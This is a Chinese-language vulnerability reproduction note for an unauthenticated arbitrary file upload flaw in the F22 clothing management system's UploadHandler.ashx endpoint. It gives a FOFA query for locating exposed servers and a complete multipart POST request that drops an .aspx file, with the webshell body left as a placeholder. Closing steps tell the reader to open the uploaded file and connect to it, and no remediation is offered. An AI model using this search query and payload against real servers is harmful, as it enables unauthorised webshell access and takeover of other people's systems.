F16-1F22-服装管理软件系统-文件上传
漏洞描述:
F22服装管理软件系统UploadHandler.ashx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件控制服务器。
网站图片:
网络测绘:
fofa语法:
FOFA:body=“F22WEB登陆”
漏洞复现:
payload:
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: your-ip
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
------------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1
Content-Disposition: form-data; name="folder"
/upload/udplog
------------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream
马子
------------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1
Content-Disposition: form-data; name="Upload"
Submit Query
------------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1--
效果图:
验证url
http://your-ip/upload/udplog/回显的文件名
尝试连接